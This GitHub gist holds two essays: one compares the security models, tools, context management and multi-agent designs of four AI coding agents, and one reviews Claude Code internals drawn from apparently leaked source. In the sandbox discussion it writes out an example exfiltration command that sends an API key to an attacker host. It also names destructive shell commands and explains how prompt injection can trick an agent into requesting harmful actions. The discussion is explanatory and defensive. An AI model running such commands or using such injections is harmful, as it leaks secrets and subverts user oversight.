Skip to content

Instantly share code, notes, and snippets.

@Haseeb-Qureshi
Created March 31, 2026 19:57
Show Gist options
  • Select an option

  • Save Haseeb-Qureshi/2213cc0487ea71d62572a645d7582518 to your computer and use it in GitHub Desktop.

Select an option

Save Haseeb-Qureshi/2213cc0487ea71d62572a645d7582518 to your computer and use it in GitHub Desktop.
AI Coding Agent Architecture Analysis: Claude Code vs Codex vs Cline vs OpenCode

I Read the Source Code of Four AI Coding Agents. The Real Product Isn't the AI.

I expected the differences between AI coding agents to be in how they call the LLM. They're not. The API call is trivial -- a streaming HTTP request with a JSON payload. Every agent does it essentially the same way.

What makes these tools different -- what makes them products -- is everything wrapped around that API call: the 40 tools that give the AI hands, the permission systems that keep it from breaking things, the compaction strategies that prevent it from forgetting what it's doing, and the prompt engineering that shapes how it thinks.

I cloned the source code for all four major AI coding agents -- Claude Code (from a leaked copy of Anthropic's proprietary source), OpenAI's Codex CLI, Cline (the popular VS Code extension), and OpenCode (an open-source Go CLI) -- and read through their internals. What I found reveals four competing philosophies about a fundamental question: how much should you trust an AI with your codebase?


The Quick Reference

Here's what we're looking at:

Claude Code Codex CLI Cline OpenCode
Maker Anthropic OpenAI Community (OSS) Community (OSS)
Language TypeScript Rust + TypeScript TypeScript Go
Interface CLI + SDK + IDE CLI (Rust TUI) VS Code extension CLI (TUI)
LLM Support Claude only OpenAI only 50+ providers Anthropic + OpenAI
Codebase ~500K lines ~80K lines ~150K lines ~30K lines
License Proprietary (leaked) Apache 2.0 Apache 2.0 MIT
Dimension Claude Code Codex Cline OpenCode
Security Permission prompts + hooks OS-level sandbox UI approval + auto-approve Channel-based approval
Tool concurrency Parallel reads, serial writes Serial (sandboxed) Serial Serial
Context mgmt Multi-strategy compaction Auto-compaction + truncation Sliding window + summary SQLite sessions + summary
Sub-agents Full multi-agent with teams Full multi-agent + guardian Sub-agent system Task sub-agents
File editing Search-and-replace Unified diff patch Full rewrite or diff Line-range edit
Session persistence JSON transcript files JSONL with session resume VS Code workspace state SQLite database
UI framework React/Ink ratatui (Rust) VS Code Webview Bubbletea

The numbers don't tell the whole story. Let me walk through what actually matters.


The Trust Spectrum

The most revealing difference between these four tools isn't a feature. It's a philosophy.

Each tool sits at a different point on that spectrum:

  1. Watch every move and approve each action (OpenCode, Cline in default mode)
  2. Set rules up front -- "you can run git commands freely, but ask before touching anything outside /src" (Claude Code's permission system)
  3. Enforce isolation at the OS level -- constrain all commands to a sandboxed process the kernel controls (Codex)
  4. Grant full access and hope for the best (any tool in "YOLO mode")

That position shapes every architectural decision.

Codex: Trust Nothing

Codex is the only tool among the four that provides real process-level isolation. When the AI runs a shell command, that command executes inside an OS-level sandbox:

  • macOS: Seatbelt sandbox profiles restrict filesystem access
  • Linux: Landlock LSM + bubblewrap containers isolate the process
  • Windows: Restricted process tokens limit capabilities

The sandbox enforces three tiers: read-only (can look but not touch), workspace-write (can modify files within the project directory only), and danger-full-access (no restrictions, requires explicit opt-in). Network access is controlled separately -- in the default mode, commands cannot make network requests at all.

If the AI decides to run rm -rf /, the operating system itself blocks the command. Not a permission prompt. Not a warning dialog.

The kernel says no.

Sandboxing isn't a complete answer, though. It prevents filesystem violations, but an approved network call could still exfiltrate data -- curl https://attacker.com?token=$API_KEY goes right through if network access is permitted. Security is defense in depth, not a single mechanism.

The tradeoff is friction. Sandboxed commands are slower. Some legitimate operations (installing packages, accessing APIs) require elevated permissions. The sandbox policy gets injected directly into the system prompt so the model knows its constraints before trying:

Filesystem sandboxing: sandbox_mode is `workspace-write`:
The sandbox permits reading files, and editing files in
`cwd` and `writable_roots`. Editing files in other
directories requires approval.

It tells the AI what it can't do before it tries, so it doesn't waste turns attempting something the sandbox would block anyway.

Claude Code: Trust the Permission System

Claude Code has no process-level sandbox. Instead, it relies on a multi-layered permission system -- like a bouncer checking IDs rather than a locked door:

  1. Permission mode -- default (ask before writes), plan (show full plan first), bypassPermissions (approve everything)
  2. Hook evaluation -- user-configured shell commands that run before each tool call
  3. Rule matching -- wildcard patterns like Bash(git *), FileEdit(/src/*)
  4. User prompt -- if no rule matches, ask the user

The Bash tool alone has an entire security subsystem: bashSecurity.ts validates commands for injection patterns, sedValidation.ts prevents sed from being used to bypass the file editing permission model, and destructiveCommandWarning.ts flags dangerous operations like rm -rf or git push --force.

The philosophy is: the AI should be powerful but supervised. A sophisticated permission system lets expert users grant broad access while keeping guardrails for everyone else. The risk is that permission prompts are only as good as the human reading them -- and a sufficiently crafted prompt injection (say, a malicious comment in a file the AI reads) could trick the model into requesting actions that look benign but aren't. Unlike Codex's kernel-enforced sandbox, Claude Code's safety depends on human judgment at every gate.

Cline: Trust the User's Eyes

Cline runs inside VS Code, which shapes its entire security model. Before the AI edits a file, you see a diff preview. Before it runs a command, you see the command. You click approve or deny. It's the most transparent model -- you always know exactly what's about to happen.

There's a granular auto-approval system where you can approve categories of actions (read files: yes, execute bash: no, write files: ask me). And there's a "YOLO mode" toggle that approves everything. The name is honest about the risk, but it reduces security to a single checkbox -- users who enable it may underestimate the actual danger of full autonomy.

Cline also has a CommandPermissionController that flags dangerous shell operators like >, |, and &&. But fundamentally, the security model is: trust the human to review what the AI wants to do.

OpenCode: Trust the Channel

OpenCode uses Go channels to create a clean blocking-approval pattern. When the agent needs permission, it creates a channel, publishes the request to the TUI, and blocks until the user responds. Persistent session-level approvals mean you don't get asked the same question twice.

It's the simplest model: ask, wait, proceed. No sandbox, no rule engine, no hooks. Just a channel and a human.


The Hands: How They Give the AI Tools

The AI is only as capable as the tools it can use. The differences are in how many tools each system provides and how it coordinates them.

Orchestration: who runs what, and when

Claude Code: 40+ Tools with Parallel Orchestration

Claude Code has the largest tool inventory: file read, file write, file edit, glob search, grep search, bash execution, web fetch, web search, notebook editing, MCP integration, LSP queries, sub-agent spawning, team creation, skill loading, and more.

The orchestration layer is particularly clever. It partitions tool calls into batches based on their nature:

  • Read-only tools (file reads, searches) run concurrently, up to 10 in parallel
  • Write tools (file edits, bash commands) run serially

So when the AI wants to read 10 files and then edit one, the 10 reads happen simultaneously, then the edit runs alone. For a typical coding task that involves reading many files before making a change, this parallel execution saves real time.

One optimization I haven't seen elsewhere: a StreamingToolExecutor starts executing tools while the model is still generating its response. If the model emits a complete tool call before it's done talking, execution begins immediately rather than waiting for the full response to finish. On a multi-tool response, this can shave seconds off wall-clock time -- the file reads are already done by the time the model finishes explaining what it's about to do.

Codex: 25+ Tools, Security First

The article you might read elsewhere would tell you Codex has only a handful of tools. That's wrong. The Rust core defines 25+ tool handlers including shell execution, code patching (in both JSON and freeform formats), directory listing, JavaScript REPL, multi-agent orchestration (spawn, resume, wait, close, send-message, list, assign-task), image viewing, MCP integration, and even batch agent jobs via spawn_agents_on_csv.

Codex's apply_patch tool deserves special attention. Instead of Claude Code's search-and-replace or Cline's full-file rewrites, Codex uses unified diff format. The model generates a patch, and the tool applies it.

This isn't just about token efficiency (though it is more efficient). Unified diff is a semantic design choice. It forces the model to reason about context lines, creating an implicit incentive for surgical edits rather than wholesale rewrites. It also makes the output portable -- AI-generated patches can be reviewed with standard diff/patch utilities, piped into code review tools, or applied by hand. Search-and-replace can silently match in the wrong location if a pattern appears multiple times; diffs are anchored to specific positions in specific files.

Every tool goes through the sandbox system. The sandbox requirements are declared per-tool, so the system knows which permissions each tool needs before it executes.

Cline: Adaptive Tool Definitions

Cline's most interesting tool trick is dual-mode definitions. Each tool has variants for different model families:

For older models that don't support function calling, tools are rendered as XML in the system prompt:

<write_to_file>
  <path>src/app.ts</path>
  <content>file contents here</content>
</write_to_file>

For newer Anthropic and OpenAI models, the same tools use native function calling APIs. This lets Cline support models that range from GPT-5 down to local Ollama models that can only parse XML.

Cline also has browser automation via Puppeteer -- a capability that lets the AI navigate web pages, click buttons, fill forms, and take screenshots. If you're building a web app and want the AI to actually test it in a browser, Cline is the only tool that does this natively.

OpenCode: LSP-Aware Tools

OpenCode has a smaller set (Bash, Edit, Fetch, Glob, Grep, LS, View, Patch, Write, Diagnostic, Agent) but with one standout: the Diagnostic tool. It queries running LSP (Language Server Protocol) servers for code diagnostics -- compiler errors, type mismatches, unused imports.

Both Claude Code and OpenCode have LSP integration, but OpenCode makes it a first-class tool the agent can invoke directly. The agent doesn't need to run a build command and parse the output to find errors; it can ask the language server directly. This gives it IDE-level understanding of the codebase.


The Memory Problem

LLMs forget. They have fixed context windows -- typically 128K to 200K tokens -- and a long coding session can easily overflow that. When it happens, the AI starts losing track of earlier decisions, file contents it read, and the overall plan. Each tool handles this differently.

Claude Code: Four Fallback Strategies

Claude Code throws everything at the problem:

  1. Proactive compaction -- monitors token count and summarizes older messages before hitting the limit
  2. Reactive compaction -- catches prompt_too_long errors from the API and compacts retroactively
  3. Snip compaction -- in SDK/headless mode, truncates at defined boundaries to bound memory in long sessions
  4. Context collapse -- a feature-flagged system that compresses verbose tool results mid-conversation without full compaction

The compaction produces a "compact boundary" marker. Everything before the boundary is replaced with a summary. The system is careful about persistence -- transcript files handle boundary relinks so --resume works correctly after compaction, even if the process was killed mid-turn.

There's also an LRU file state cache (100 files, 25MB) that tracks file contents across turns, preventing redundant re-reads.

Codex: Rust-Powered Compaction

Codex's context management is more capable than it looks from the outside. The Rust core includes compact.rs and compact_remote.rs with pre-turn compaction, mid-turn compaction, and remote compaction strategies. A summarization prompt template generates concise context summaries, and token-aware truncation via the output truncation utilities keeps tool results from dominating the context window.

Cline: The Self-Summary Approach

Cline takes a pragmatic approach. It calculates usable context per model (200K Claude models get a 160K buffer; 128K models get 98K). When approaching the limit, a CondenseHandler asks the LLM itself to summarize the conversation -- capturing intent, modified files, code snippets, pending tasks, and next steps. It's meta-prompting: the AI summarizes its own work so it can continue from the summary.

OpenCode: Sessions in SQLite

OpenCode stores everything in SQLite -- sessions, messages, token counts, costs. Sessions can have sub-sessions (for tool calls) and auto-generated titles. The SummaryMessageID field enables conversation summarization, though the compaction is simpler than the others.


Prompt Engineering as a Science

This is where having the actual source code matters most. You can't reverse-engineer a system prompt from the outside. How these tools instruct the LLM reveals their design philosophy more than any other component.

Claude Code: Data-Driven, A/B Tested, Cache-Optimized

Claude Code's system prompt is assembled from ~15 composable functions, each generating a section: identity, system rules, coding style, destructive action safety, tool usage guidance, tone, output efficiency, environment info, memory, MCP instructions.

Three patterns stand out:

The cache boundary. A marker called __SYSTEM_PROMPT_DYNAMIC_BOUNDARY__ splits the prompt into two halves. Everything above is static -- the behavioral instructions that are the same for every user -- and gets cached with scope: 'global' in the Anthropic API. Everything below is per-session (your CLAUDE.md files, your MCP servers, your environment). This means the ~3,000 tokens of behavioral rules are cached and reused across all users globally, saving on API costs at scale.

Numeric length anchors. Instead of saying "be concise," the internal prompt says:

Length limits: keep text between tool calls to <=25 words.
Keep final responses to <=100 words unless the task
requires more detail.

An internal source code comment references "~1.2% output token reduction vs qualitative 'be concise'" from A/B testing. That's internal company data, not peer-reviewed research, but it suggests Anthropic treats prompt wording like ad copy -- specific numbers outperform vague instructions, and they're measuring the difference.

Internal vs. external prompts. A process.env.USER_TYPE === 'ant' check throughout the codebase gives Anthropic's internal engineers different prompts. Internal users get: "If you notice the user's request is based on a misconception, say so" and "Never claim 'all tests pass' when output shows failures." There are also A/B test markers throughout: @[MODEL LAUNCH]: capy v8 thoroughness counterweight (PR #24302) -- un-gate once validated on external via A/B. The leaked source is a window into how Anthropic iterates on prompt engineering in production.

Codex: Sandbox-Aware Prompting

Codex's cleverest prompt idea is injecting the current sandbox policy directly into the system prompt. The model is told exactly what it can and cannot do before it tries. This reduces wasted turns where the model attempts something the sandbox would block.

Cline: Multi-Model Templating

Cline uses a PromptRegistry with model-family variants. The same conceptual instruction renders differently for Claude, GPT-5, Gemini, and generic models. This is necessary overhead when supporting 50+ providers -- each model responds differently to the same phrasing.

OpenCode: Provider-Specific Prompts

OpenCode takes a simpler approach -- different base prompts for Anthropic and OpenAI models, selected at runtime based on the configured provider. The prompts include instructions for OpenCode.md (their equivalent of CLAUDE.md) and LSP integration guidance.


Multi-Agent: AIs That Delegate to Other AIs

All four tools can now spawn sub-agents -- separate AI instances that work on sub-problems independently. The implementations vary wildly.

Claude Code: The Full Orchestra

Claude Code has the richest multi-agent system among the four:

  • AgentTool spawns sub-agents with their own QueryEngine instances and filtered tool sets
  • Agents can run foreground (blocking) or background (async, with notification on completion)
  • SendMessageTool enables inter-agent communication
  • TeamCreateTool spawns multiple agents as a coordinated team
  • Agents can get their own git worktrees -- filesystem-level isolation so they don't step on each other's changes
  • A "fork" mode where the sub-agent keeps its tool output out of the parent's context (protecting the parent from context bloat)
  • Auto-background after 120 seconds to prevent sub-agents from blocking indefinitely

The system prompt explicitly prevents infinite delegation: "If you ARE the fork -- execute directly; do not re-delegate."

Codex: Agent Orchestration + Safety Guardian

Codex has a more extensive multi-agent system than it's usually given credit for. The Rust core includes full agent lifecycle management: spawn_agent, resume_agent, wait_agent, close_agent, send_message, list_agents, and assign_task. There's even spawn_agents_on_csv for batch agent jobs.

On top of this, Codex has a guardian_subagent -- a separate AI that reviews tool calls for policy compliance. Think of it as a security reviewer that runs alongside the main agent, catching dangerous actions before they execute. When the guardian is uncertain, it escalates to the user.

Cline: Sub-Agent Support

Cline has a sub-agent system built around SubagentRunner, SubagentBuilder, and SubagentToolHandler, with configurable agent definitions loaded via AgentConfigLoader. Sub-agents can be defined and spawned for specific tasks.

OpenCode: Task Agents

OpenCode supports task sub-agents that get their own tool sets and sessions stored as child records in SQLite. Simpler than Claude Code's or Codex's systems, but functional.


The Lock-In Question

Nobody talks about this enough: Claude Code only works with Claude. Codex only works with OpenAI models.

If you build your workflow around Claude Code, you're locked into Anthropic's pricing and availability. Same for Codex with OpenAI. If either company raises prices, degrades quality, or suffers an outage, you have no fallback.

Cline is the escape hatch. Its 50+ provider support means you can switch models -- or use local models via Ollama -- without changing your workflow. The tradeoff is that multi-provider support adds complexity and the experience is inevitably less polished than a tool optimized for a single provider.

OpenCode splits the difference: it supports both Anthropic and OpenAI, giving you a choice between the two largest providers without the sprawl of 50+ integrations.

For team adoption, this matters more than any technical comparison. The best architecture is irrelevant if the company changes its pricing model.


Where this is going

The tool system is the product. Claude Code has 500K lines of code; the actual API call is maybe 200 of them. Everything else is the harness -- and the harness is where the differentiation happens.

Security reflects different threat models, not a linear scale. Codex provides OS-enforced isolation. Claude Code provides user-configurable permission rules. Cline prioritizes human oversight. None is universally "more secure" -- each optimizes for different use cases and different levels of user expertise. But as these tools gain autonomy, all of them will need to get better here. Permission prompts don't scale to agents that run overnight.

Multi-agent is where the hard engineering problems are. All four tools now support sub-agents in some form. The challenges -- shared state, merge conflicts, context isolation, preventing infinite delegation -- are the same challenges distributed systems have always faced. The team that solves multi-agent coordination cleanly wins.

Context management separates toys from tools. The difference between an agent that works for a 10-minute task and one that works for a 10-hour session is entirely about how it handles forgetting. Claude Code's four-layer compaction, Codex's Rust-powered truncation, Cline's self-summarization -- they're all fighting the same enemy.

The survivors will combine Codex's security model, Claude Code's orchestration, Cline's flexibility, and OpenCode's LSP integration. Whether that convergence happens through competition or open-source collaboration is the interesting question.


Which One Should You Use?

For maximum capability today: Claude Code. Deepest tool system, best context management, most powerful multi-agent orchestration. The tradeoff is vendor lock-in to Anthropic and a complexity level that's hard to debug when things go wrong.

For security-sensitive environments: Codex. OS-level sandboxing is a fundamentally different safety guarantee than permission prompts. If you're working on a codebase where a runaway command could cause real damage, Codex is the only tool that provides genuine containment. Its multi-agent and compaction capabilities are better than people think.

For maximum flexibility: Cline. If you want to use whatever model is best right now -- or switch tomorrow without changing your workflow -- Cline is the only option. Browser automation and sub-agents are bonuses. The tradeoff is it only runs inside VS Code.

For understanding and customization: OpenCode. At 30K lines of clean Go, you can read the entire codebase in a day. If you want to fork a coding agent and build on it, start here. LSP integration and SQLite sessions are well-engineered foundations.

Right now, your choice of model often forces your choice of harness -- Claude Code for Claude, Codex for GPT. That coupling will weaken as models commoditize and the harness features (multi-agent, security, context management) become the real differentiators. The shift is already visible: Cline's 50+ provider support exists precisely because some users value harness flexibility over model lock-in.

Inside Claude Code: How Anthropic Built a Production Agentic Harness

A leaked copy of Anthropic's Claude Code CLI source code surfaced on GitHub recently. At roughly 1,900 files and 500,000+ lines of TypeScript, it's one of the most complete pictures we've ever gotten of what a production-grade agentic coding harness actually looks like under the hood.

I downloaded it, read through the key modules, and what follows is a detailed breakdown of how the system works -- including the clever engineering patterns that aren't obvious from the outside.


The Core Loop: QueryEngine and query()

Everything starts with QueryEngine (src/QueryEngine.ts), a class that owns a single conversation's lifecycle. It exposes one key method:

async *submitMessage(
  prompt: string | ContentBlockParam[],
): AsyncGenerator<SDKMessage, void, unknown>

This is an async generator. The caller (CLI REPL, SDK, IDE bridge) sends a message and iterates over the yielded events -- assistant text, tool calls, progress updates, errors, compaction boundaries, and eventually a terminal result message.

Inside submitMessage, the flow is:

  1. Assemble system prompt -- from composable sections (more on this below)
  2. Process user input -- handle slash commands, attachments, queued commands
  3. Snapshot file state -- for undo support
  4. Enter the query loop -- call query() which is the real engine

The query() function in src/query.ts is a while(true) loop:

while (true) {
  stream response from Anthropic API
  if stop_reason === "end_turn" → break
  if tool_use blocks → execute tools → feed results back → continue
  if max_turns or budget exceeded → break with error
  if context too large → compact → continue
}

Every iteration sends the full message history to the API, gets back a streamed response, and checks whether to continue. The loop only terminates on end_turn, budget exhaustion, max turns, or abort signal.

The "Thinking Rules" Comment

There's a delightful comment in query.ts that encapsulates the pain of working with the API:

The rules of thinking are lengthy and fortuitous. They require plenty
of thinking of most long duration and deep meditation for a wizard to
wrap one's noggin around.

The rules follow:
1. A message that contains a thinking block must be part of a query
   whose max_thinking_length > 0
2. A thinking block may not be the last message in a block
3. Thinking blocks must be preserved for the duration of an assistant
   trajectory

Heed these rules well, young wizard. For they are the rules of
thinking, and the rules of thinking are the rules of the universe.
If ye does not heed these rules, ye will be punished with an entire
day of debugging and hair pulling.

This is not documentation for the reader -- it's a scar from production debugging.


The Tool System: 40+ Tools, Orchestrated

Tools live in src/tools/, each built with a buildTool() factory:

buildTool({
  name: "Edit",
  inputSchema: z.object({ file_path: z.string(), ... }),
  call: async (input, context) => { ... },
  checkPermissions: async (input, context) => { ... },
  isConcurrencySafe: () => true,
  isReadOnly: () => false,
  prompt: () => "Performs exact string replacements...",
})

The key insight is the orchestration model in src/services/tools/toolOrchestration.ts:

  • Read-only tools (Glob, Grep, Read) run concurrently, up to 10 in parallel
  • Write tools (Edit, Write, Bash) run serially
  • Each tool declares isConcurrencySafe() -- the harness respects this at runtime

This means when Claude wants to read 5 files simultaneously, it can. But when it wants to edit a file and then run tests, those are serialized.

Streaming Tool Execution

There's a StreamingToolExecutor that begins executing tool calls while the model is still streaming. If the model emits a complete tool_use block before the full response finishes, execution starts immediately. This saves significant latency on multi-tool responses.

BashTool: The Most Complex Tool

The Bash tool has its own security subsystem:

  • bashSecurity.ts -- validates commands for injection patterns
  • bashPermissions.ts -- checks against permission rules
  • sedValidation.ts and sedEditParser.ts -- prevents sed from being used to bypass the Edit tool's permission model
  • destructiveCommandWarning.ts -- flags rm -rf, git push --force, etc.
  • shouldUseSandbox.ts -- decides whether to run in a sandboxed environment

There's also commandSemantics.ts which classifies bash commands by their nature (read-only, write, network, etc.) for smarter permission decisions.


System Prompt Engineering: The Art of Composition

The system prompt (src/constants/prompts.ts) is not a single string. It's assembled from ~15 composable sections, each generated by a function:

getSimpleIntroSection()      -- identity and role
getSimpleSystemSection()     -- tool permission mode, system-reminder tags
getSimpleDoingTasksSection() -- coding style rules
getActionsSection()          -- destructive action safety
getUsingYourToolsSection()   -- tool usage guidance
getSimpleToneAndStyleSection() -- communication style
getOutputEfficiencySection() -- brevity rules
[DYNAMIC_BOUNDARY]           -- cache split marker
getSessionSpecificGuidanceSection() -- session-variant rules
loadMemoryPrompt()           -- CLAUDE.md files
computeSimpleEnvInfo()       -- OS, shell, git, model info
getMcpInstructionsSection()  -- MCP server instructions

The Cache Boundary Trick

The cleverest piece is SYSTEM_PROMPT_DYNAMIC_BOUNDARY:

export const SYSTEM_PROMPT_DYNAMIC_BOUNDARY =
  '__SYSTEM_PROMPT_DYNAMIC_BOUNDARY__'

Everything above this marker is static and gets cached with scope: 'global' in the Anthropic API's prompt caching. Everything below is session-specific (user's CLAUDE.md, MCP servers, environment info) and cannot be cached across users.

This means the ~3,000 tokens of behavioral instructions are cached and reused across all users, while per-session context is injected after the boundary. The source has comments about "Blake2b prefix hash variants" -- they're hashing the cacheable prefix to maximize cache hits.

Internal vs External Prompts

There's a process.env.USER_TYPE === 'ant' check throughout the prompts. Internal Anthropic users get different instructions:

  • More assertive: "If you notice the user's request is based on a misconception, or spot a bug adjacent to what they asked about, say so."
  • Anti-false-claims: "Never claim 'all tests pass' when output shows failures, never suppress or simplify failing checks to manufacture a green result."
  • Numeric length anchors: "Keep text between tool calls to <=25 words." (Research showed ~1.2% output token reduction vs qualitative "be concise")
  • Verification agents: Spawns an adversarial verification agent after non-trivial changes

External users get simpler, terser instructions.

"Undercover" Mode

There's an isUndercover() utility. When active, it strips ALL model names and IDs from the system prompt so internal model identifiers can't leak into public commits or PRs. The comments explicitly warn about dead code elimination:

// DCE: `process.env.USER_TYPE === 'ant'` is build-time --define.
// It MUST be inlined at each callsite (not hoisted to a const)
// so the bundler can constant-fold it to `false` in external
// builds and eliminate the branch.

Permission System: Multi-Layered Safety

Every tool call passes through a permission pipeline before execution:

  1. Permission mode check -- default, plan, bypassPermissions, auto
  2. Hook evaluation -- user-configured shell commands via PreToolUse hooks
  3. Rule matching -- wildcard patterns like Bash(git *), FileEdit(/src/*)
  4. User prompt -- if no rule matches, ask the user

The permission system tracks denials and replays them to the SDK caller. If a user denies a tool call, the denial is wrapped and fed back to Claude so it can adjust its approach.

The "Auto" Mode Experiment

There's an experimental auto mode that uses an ML classifier to decide permissions -- essentially a smaller model gatekeeping the larger model's actions. The implementation is behind a feature flag.


Sub-Agent System: Nested QueryEngines

AgentTool (src/tools/AgentTool/) is perhaps the most architecturally interesting piece. When Claude spawns a sub-agent, it:

  1. Creates a new QueryEngine instance
  2. Filters the available tool set (sub-agents get fewer tools)
  3. Optionally creates a git worktree for filesystem isolation
  4. Runs the sub-agent either foreground (blocking) or background (async)

Sub-agents communicate with the parent via SendMessageTool. There's also TeamCreateTool for spawning multiple agents as a coordinated team.

Fork Subagents

There's a newer "fork" model (forkSubagent.ts) where the sub-agent is described as running "in the background and keeps its tool output out of your context." The key system prompt instruction:

If you ARE the fork -- execute directly; do not re-delegate.

This prevents infinite delegation chains.

Agent Auto-Background

If a foreground agent runs for more than 120 seconds, the system can automatically background it. This prevents sub-agents from blocking the main conversation indefinitely.


Context Management: Auto-Compaction

When the conversation approaches context limits, the system automatically compacts:

  1. Detects token count approaching the limit
  2. Summarizes older messages into a compact boundary marker
  3. Replaces the original messages with the summary
  4. Continues with the compressed context

There's also a "reactive compaction" feature (reactiveCompact.ts) that triggers when the API actually returns a prompt_too_long error -- a fallback for when the proactive compaction misses.

Snip Compaction (SDK Mode)

For headless/SDK mode, there's a different compaction strategy called "snip" that truncates old messages at defined boundaries. The comment explains:

SDK-only: the REPL keeps full history for UI scrollback and projects
on demand via projectSnippedView; QueryEngine truncates here to bound
memory in long headless sessions (no UI to preserve).

File State Cache

An LRU cache (100 files, 25MB) tracks file contents across turns. This prevents redundant file reads and enables the undo system. Before any edit, a file history snapshot is taken so the user can revert changes.


Feature Flags: Build-Time Dead Code Elimination

The codebase uses Bun's bundle-time feature flags extensively:

import { feature } from 'bun:bundle'

if (feature('VOICE_MODE')) {
  // This entire branch is stripped at build time if flag is off
}

The conditional imports are structured to ensure dead code elimination works:

const proactiveModule =
  feature('PROACTIVE') || feature('KAIROS')
    ? require('../proactive/index.js')
    : null

This pattern ensures that feature-gated modules don't even get loaded in builds that don't include them. Notable feature flags:

  • PROACTIVE / KAIROS -- autonomous proactive agent behavior
  • VOICE_MODE -- voice input/output
  • BRIDGE_MODE -- IDE integration
  • COORDINATOR_MODE -- multi-agent coordination
  • HISTORY_SNIP -- conversation snip compaction
  • REACTIVE_COMPACT -- reactive context compaction
  • TOKEN_BUDGET -- "spend 500k tokens" user-directed budget
  • VERIFICATION_AGENT -- adversarial verification sub-agent
  • ABLATION_BASELINE -- A/B testing baseline

Hook System: Lifecycle Events

The hook system defines lifecycle events:

PreToolUse, PostToolUse, SessionStart, SessionEnd,
Stop, SubagentStart, PermissionRequest, FileChanged,
CwdChanged

Users configure shell commands in settings.json that fire at these events. Hook output is treated as user input -- if a hook says "stop", the agent stops. This is how organizations implement custom policies without forking the codebase.


Multiple Entrypoints: One Engine, Many Interfaces

The QueryEngine is used by four different entrypoints:

Entrypoint Path Purpose
CLI src/entrypoints/cli.tsx Terminal REPL (Commander.js + React/Ink)
SDK src/entrypoints/sdk/ Programmatic API for embedding
MCP Server src/entrypoints/mcp.ts Exposes Claude Code as an MCP tool server
Bridge src/bridge/ IDE integration (VS Code, JetBrains) via JWT-auth

The CLI entrypoint is itself a React application rendered with Ink (React for the terminal). The entire terminal UI -- message bubbles, tool call displays, permission prompts, progress indicators -- is a React component tree.


Non-Obvious Engineering Tricks

1. Speculation

There's a speculation system that pre-computes likely next responses while the user is typing. This hides latency for predictable interactions.

2. Parallel Prefetch at Startup

const [skillToolCommands, outputStyleConfig, envInfo] =
  await Promise.all([
    getSkillToolCommands(cwd),
    getOutputStyleConfig(),
    computeSimpleEnvInfo(model),
  ])

Heavy initialization (MCP client connections, keychain access, API pre-connect, skill loading) all fire in parallel at startup.

3. Memory Prefetch During Streaming

While the model is streaming its response, the system prefetches relevant memories:

using pendingMemoryPrefetch = startRelevantMemoryPrefetch(
  state.messages, state.toolUseContext,
)

The using keyword (TC39 explicit resource management) ensures cleanup on all generator exit paths.

4. Transcript Persistence Strategy

Transcript writes are fire-and-forget for assistant messages but awaited for user messages. The comment explains why:

If the process is killed before the API responds, the transcript is
left with only queue-operation entries; getLastSessionLog filters
those out, returns null, and --resume fails with "No conversation
found". Writing now makes the transcript resumable from the point
the user message was accepted.

5. Tool Use Summaries

After tool execution, the system generates summaries of what tools did. These summaries are yielded to the SDK so IDE integrations can show concise representations of long tool outputs.

6. Numeric Length Anchors

The internal prompt includes:

Length limits: keep text between tool calls to <=25 words.
Keep final responses to <=100 words unless the task requires
more detail.

A comment notes: "research shows ~1.2% output token reduction vs qualitative 'be concise'." Specific numbers outperform vague instructions.

7. Lazy Module Loading

Heavy modules are loaded lazily to minimize startup time:

const messageSelector =
  (): typeof import('src/components/MessageSelector.js') =>
    require('src/components/MessageSelector.js')

React/Ink components, OpenTelemetry, gRPC clients -- all deferred until first use.

8. Error Log Watermarking

const errorLogWatermark = getInMemoryErrors().at(-1)

Before entering the query loop, the system snapshots the last error. After the loop, it can report only errors that occurred during this specific turn, even though the error log is a shared ring buffer that shifts entries.

9. Context Collapse

There's a feature-flagged contextCollapse system that can collapse verbose tool results into shorter representations mid-conversation, reducing context usage without full compaction.


The Skill System: Runtime-Loaded Capabilities

Skills are markdown files with frontmatter that get loaded at runtime:

---
name: commit
description: Create a git commit
allowed_tools: [Bash, Read, Glob, Grep]
---

<prompt content for how to commit>

The SkillTool finds and loads these files, injecting their prompt content into the conversation. This is how /commit, /review-pr, and other slash commands work -- they're not hardcoded features, they're loaded prompt templates.

There's even an experimental EXPERIMENTAL_SKILL_SEARCH feature that uses vector search to find relevant skills automatically based on the user's current task.


What Makes This a "Harness"

The word "harness" captures it precisely. Claude Code is not just a chat interface over an API. It's a sophisticated control system that:

  1. Manages the conversation lifecycle -- from prompt assembly through compaction to session persistence
  2. Gates every action through permissions -- with multiple layers of checks before any tool executes
  3. Orchestrates parallel execution -- running read tools concurrently while serializing writes
  4. Controls context growth -- through auto-compaction, snip boundaries, and context collapse
  5. Enables recursive delegation -- through sub-agents with isolated contexts
  6. Provides budget controls -- max turns, max USD spend, token budgets, task budgets
  7. Supports multiple interfaces -- CLI, SDK, MCP server, IDE bridge -- all sharing one engine
  8. Remains extensible -- through hooks, skills, MCP servers, and plugins

The engineering quality is high. Error handling is thoughtful (the transcript persistence strategy alone shows deep production experience). The feature flag system enables rapid experimentation. The prompt engineering is data-driven (numeric length anchors, A/B test markers).

This is what it looks like when a company with significant resources builds an agentic coding tool from scratch and runs it in production at scale.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment